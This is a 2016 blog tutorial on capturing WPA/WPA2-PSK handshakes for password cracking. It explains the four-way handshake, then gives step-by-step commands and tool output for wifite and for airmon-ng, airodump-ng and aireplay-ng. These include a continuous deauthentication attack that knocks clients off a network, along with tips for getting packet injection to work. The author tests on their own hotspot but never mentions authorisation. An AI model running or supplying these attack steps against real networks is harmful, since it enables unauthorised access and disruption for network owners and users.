Thursday, 21 July 2016

Hack WPA/WPA-2 PSK Capturing the Handshake

WPA password hacking


Okay, so hacking WPA-2 PSK involves 2 main steps-
  1. Getting a handshake (it contains the hash of password, i.e. encrypted password)
  2. Cracking the hash.

Now the first step is conceptually easy. What you need is you, the attacker, a client who'll connect to the wireless network, and the wireless access point. What happens is when the client and access point communicate in order to authenticate the client, they have a 4 way handshake that we can capture. This handshake has the hash of the password. Now there's no direct way of getting the password out of the hash, and thus hashing is a robust protection method. But there is one thing we can do. We can take all possible passwords that can exists, and convert them to hash. Then we'll match the hash we created with the one that's there in the handshake. Now if the hashes match, we know what plain text password gave rise to the hash, thus we know the password. If the process sounds really time consuming to you, then its because it is. WPA hacking (and hash cracking in general) is pretty resource intensive and time taking process. Now there are various different ways cracking of WPA can be done. But since WPA is a long shot, we shall first look at the process of capturing a handshake. We will also see what problems one can face during the process (I'll face the problems for you). Also, before that, some optional wikipedia theory on what a 4-way handshake really is (you don't want to become a script kiddie do you?)

The Four-Way Handshake

The authentication process leaves two considerations: the access point (AP) still needs to authenticate itself to the client station (STA), and keysto encrypt the traffic need to be derived. The earlier EAP exchange or WPA2-PSK has provided the shared secret key PMK (Pairwise Master Key). This key is, however, designed to last the entire session and should be exposed as little as possible. Therefore the four-way handshake is used to establish another key called the PTK (Pairwise Transient Key). The PTK is generated by concatenating the following attributes: PMK, AP nonce(ANonce), STA nonce (SNonce), AP MAC address, and STA MAC address. The product is then put through PBKDF2-SHA1 as the cryptographic hash function.
The handshake also yields the GTK (Group Temporal Key), used to decrypt multicast and broadcast traffic. The actual messages exchanged during the handshake are depicted in the figure and explained below:
  1. The AP sends a nonce-value to the STA (ANonce). The client now has all the attributes to construct the PTK.
  2. The STA sends its own nonce-value (SNonce) to the AP together with a MIC, including authentication, which is really a Message Authentication and Integrity Code: (MAIC).
  3. The AP sends the GTK and a sequence number together with another MIC. This sequence number will be used in the next multicast or broadcast frame, so that the receiving STA can perform basic replay detection.
  4. The STA sends a confirmation to the AP.
All the above messages are sent as EAPOL-Key frames.
As soon as the PTK is obtained it is divided into five separate keys:
PTK (Pairwise Transient Key – 64 bytes)
  1. 16 bytes of EAPOL-Key Confirmation Key (KCK)– Used to compute MIC on WPA EAPOL Key message
  2. 16 bytes of EAPOL-Key Encryption Key (KEK) - AP uses this key to encrypt additional data sent (in the 'Key Data' field) to the client (for example, the RSN IE or the GTK)
  3. 16 bytes of Temporal Key (TK) – Used to encrypt/decrypt Unicast data packets
  4. 8 bytes of Michael MIC Authenticator Tx Key – Used to compute MIC on unicast data packets transmitted by the AP
  5. 8 bytes of Michael MIC Authenticator Rx Key – Used to compute MIC on unicast data packets transmitted by the station
The Michael MIC Authenticator Tx/Rx Keys provided in the handshake are only used if the network is using TKIP to encrypt the data.


 By the way, if you didn't understand much of it then don't worry. There's a reason why people don't  search for hacking tutorials on Wikipedia (half the stuff goes above the head)

Capturing The Handshake

Now there are several (only 2 listed here) ways of capturing the handshake. We'll look at them one by one-
  1. Wifite (easy and automatic)
  2. Airodump-ng (easy but not automatic, you manually have to do what wifite did on its own)

Wifite

Methodology

We'll go with the easy one first. Now you need to realize that for a handshake to be captured, there needs to be a handshake. Now there are 2 options, you could either sit there and wait till a new client shows up and connects to the WPA network, or you can force the already connected clients to disconnect, and when they connect back, you capture their handshake. Now while other tutorials don't mention this, I will (such a good guy I am :) ). Your network card is good at receiving packets, but not as good in creating them. Now if your clients are very far from you, your deauth requests (i.e. please get off this connection request) won't reach them, and you'll keep wondering why you aren't getting any handshake (the same kind of problem is faced during ARP injection and other kind of attacks too). So, the idea is to be as close to the access point (router) and the clients as possible. Now the methodology is same for wifite and airodump-ng method, but  wifite does all this crap for you, and in case of airodump-ng, you'll have to call a brethren (airreply-ng) to your rescue. Okay enough theory.

Get the handshake with wifite

Now my configuration here is quite simple. I have my cellphone creating a wireless network named 'me' protected with wpa-2. Now currently no one is connected to the network. Lets try and see what wifite can do.

root@kali:~# wifite
  .;'                     `;,
 .;'  ,;'             `;,  `;,   WiFite v2 (r85)
.;'  ,;'  ,;'     `;,  `;,  `;,
::   ::   :   ( )   :   ::   ::  automated wireless auditor
':.  ':.  ':. /_\ ,:'  ,:'  ,:'
 ':.  ':.    /___\    ,:'  ,:'   designed for Linux
  ':.       /_____\      ,:'
           /       \     


 [+] scanning for wireless devices...
 [+] enabling monitor mode on wlan0... done
 [+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
 [0:00:04] scanning wireless networks. 0 targets and 0 clients found

 [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  me                     1  WPA2  57db   wps
    2  *******              11  WEP   21db    no   client
    3  **************   11  WEP   21db    no

Now as you can see, my network showed up as 'me'. I pressed ctrl+c and wifite asked me which target to attack (the network has wps enabled. This is an added bonus, reaver can save you from all the trouble. Also, wifite will use reaver too to skip the whole WPA cracking process and use a WPS flaw instead. We have a tutorial on hacking WPA WPS using Reaver already, in this tutorial we'll forget that this network has WPS and capture the handshake instead)
[+] select target numbers (1-3) separated by commas, or 'all': 
Now I selected the first target,  i.e. me. As expected, it had two attacks in store for us. First it tried the PIN guessing attack. It has almost 100% success rate, and would have given us the password had I waited for 2-3 hours. But I pressed ctrl+c and it tried to capture the handshake. I waited for 10-20 secs, and then pressd ctrl+c. No client was there so no handshake could be captured. Here's what happened.
[+] 1 target selected.
 [0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:24] WPS attack, 0/0 success/ttl,
 (^C) WPS brute-force attack interrupted
 [0:08:20] starting wpa handshake capture on "me"
 [0:08:05] listening for handshake...             
 (^C) WPA handshake capture interrupted
 [+] 2 attacks completed:
 [+] 0/2 WPA attacks succeeded
 [+] disabling monitor mode on mon0... done
 [+] quitting

Now I connected my other PC to 'me'. Lets do it again. This time a client will show up, and wifite will de-authenticate it, and it'll try to connect again. Lets see what happens this time around.


   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  *    1  WPA   99db    no   client
    2  me  1 WPA2  47db   wps   client
    3  *    11  WEP   22db    no   clients
    4  *   11  WEP   20db    no

 [+] select target numbers (1-4) separated by commas, or 'all': 2
 [+] 1 target selected.
 [0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:07] WPS attack, 0/0 success/ttl,
 (^C) WPS brute-force attack interrupted
 [0:08:20] starting wpa handshake capture on "me"
 [0:07:51] listening for handshake...             
 (^C) WPA handshake capture interrupted
 [+] 2 attacks completed:
 [+] 0/2 WPA attacks succeeded
 [+] quitting


Now the deauth attacks weren't working. This time I increased the deauth frequency.
root@kali:~# wifite -wpadt 1
Soon, however, I realized, that the problem was that I was using my internal card (Kali Live USB). It does not support packet injection, so deauth wasn't working. So time to bring my external card to the scene.

root@kali:~# wifite
  .;'                     `;,
 .;'  ,;'             `;,  `;,   WiFite v2 (r85)
.;'  ,;'  ,;'     `;,  `;,  `;,
::   ::   :   ( )   :   ::   ::  automated wireless auditor
':.  ':.  ':. /_\ ,:'  ,:'  ,:'
 ':.  ':.    /___\    ,:'  ,:'   designed for Linux
  ':.       /_____\      ,:'
           /       \     


 [+] scanning for wireless devices...
 [+] available wireless devices:
  1. wlan1        Ralink RT2870/3070    rt2800usb - [phy1]
  2. wlan0        Atheros     ath9k - [phy0]
 [+] select number of device to put into monitor mode (1-2):


See, we can use the USB card now. This will solve the problems for us.
Now look at wifite output
   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  me                     1  WPA2  44db   wps   client
    2  *                       11  WEP   16db    no   client
    3  *                         11  WEP   16db    no

 [+] select target numbers (1-3) separated by commas, or 'all':
Now I attack the target. This time, finally, I captured a handshake.
 [+] 1 target selected.
 [0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:01] WPS attack, 0/0 success/ttl,
 (^C) WPS brute-force attack interrupted
 [0:08:20] starting wpa handshake capture on "me"
 [0:07:23] listening for handshake...             
 [0:00:57] handshake captured! saved as "hs/me_02-73-8D-**-**-**.cap"
 [+] 2 attacks completed:
 [+] 1/2 WPA attacks succeeded
        me (02:73:8D:37:A7:ED) handshake captured
        saved as hs/me_02-73-8D-**-**-**.cap

 [+] starting WPA cracker on 1 handshake
 [!] no WPA dictionary found! use -dict <file> command-line argument
 [+] disabling monitor mode on mon0... done
 [+] quitting
As you can see, it took me 57 seconds to capture the handshake (5 deauth requests were sent, one every 10 secs is defualt). The no dictionary error shouldn't bother you. We'll use Wifite only to capture the handshake. Now the captured handshake was saved as a .cap file which can be cracked using aircrack, pyrit, hashcat (after converting .hccap), etc. using either a wordlist or bruteforce. Let's see how to do the same thing with airodump-ng. This time I won't show you the problems you might run into. It'll be a perfect ride, all the problems were seen in wifite case.



Capturing Handshake with Airodump-ng

Now if you skipped everything and got right here, then you are missing a lot of things. I'll end this pretty quick, as the wifite thing was quite detailed. I'm copying stuff from http://www.kalitutorials.net/2013/08/wifi-hacking-wep.html where I already discussed airodump-ng. (If you are not a newbie, skip to the point where you see root@kali in red)

1. Find out the name of your wireless adapter.



Alright, now, your computer has many network adapters, so to scan one, you need to know its name. So there are basically the following things that you need to know-
  • lo - loopback. Not important currently.
  • eth - ethernet
  • wlan - This is what we want. Note the suffix associated.
Now, to see all the adapters, type ifconfig on a terminal. See the result. Note down the wlan(0/1/2) adapter.


Trouble with the wlan interface not showing up. This is because virtual machines can't use internal wireless cards and you will have to use external cards. You should try booting Kali using Live USB (just look at the first part of this tutorial), or buy an external card.

2. Enable Monitor mode

Now, we use a tool called airmon-ng to  create a virtual interface called mon. Just type 
airmon-ng start wlan0
 Your mon0 interface will be created.



3. Start capturing packets

Now, we'll use airodump-ng to capture the packets in the air. This tool gathers data from the wireless packets in the air. You'll see the name of the wifi you want to hack.
airodump-ng mon0

4. Store the captured packets in a file 

This can be achieved by giving some more parameters with the airodump command
airodump-ng mon0 --write name_of_file


Non newbies-
root@kali:~# airmon-ng start wlan1
root@kali:~# airodump-ng mon0 -w anynamehere

 Now copy the bssid field of your target network (from airodump-ng ng screen)and launch a deauth attack with aireplay-ng

 root@kali:~# aireplay-ng --deauth 0 -a BSSID here mon0

The --deauth tells aireplay to launch a deauth attack. 0 tell it to fire it at interval of 0 secs (very fast so run it only for a few secs and press ctrl+c). -a will required BSSID and replace BSSID here with your target BSSID. mon0 is the interface you created.
In case you face problems with the monitor mode hopping from one channel to another, or problem with beacon frame, then fix mon0 on a channel using-
root@kali:~# airodump-ng mon0 -w anynamehere -c 1
Replace 1 with the channel where your target AP is. You might also need to add --ignore-negative-one if aireplay demands it. In my case airodump-ng says fixed channel mon0: -1 so this was required. (It's a bug with aircrack-ng suite). 

Now when you look at the airodump-ng screen, you'll see that at the top right it says WPA handshake captured . Here is what it looks like
 CH  1 ][ Elapsed: 24 s ][ 2014-06-13 22:41 ][ WPA handshake: **                                 
                                                                                                                                             
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                             
 02:73:8D:37:A7:ED  -47  75      201       35    0   1  54e  WPA2 CCMP   PSK  me                                                                
                                                                                                                                             
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                   
                                                                                                                                             
 *                     *                            0    0e- 1    742       82  me                                                                       
*                       *                           -35  0e- 1      0   26                                                                                   

You can confirm it by typing the following
root@kali:~# aircrack-ng anynamehere-01.cap
Opening anynamehere-01.cap
Read 212 packets.
   #  BSSID              ESSID                     Encryption
   1  **************  me                        WPA (1 handshake)
   2  **                          Unknown



Happy cracking, all that needs to be done in this tutorial has been done. Its been a long one. Hope it helped you.

No comments:

Post a Comment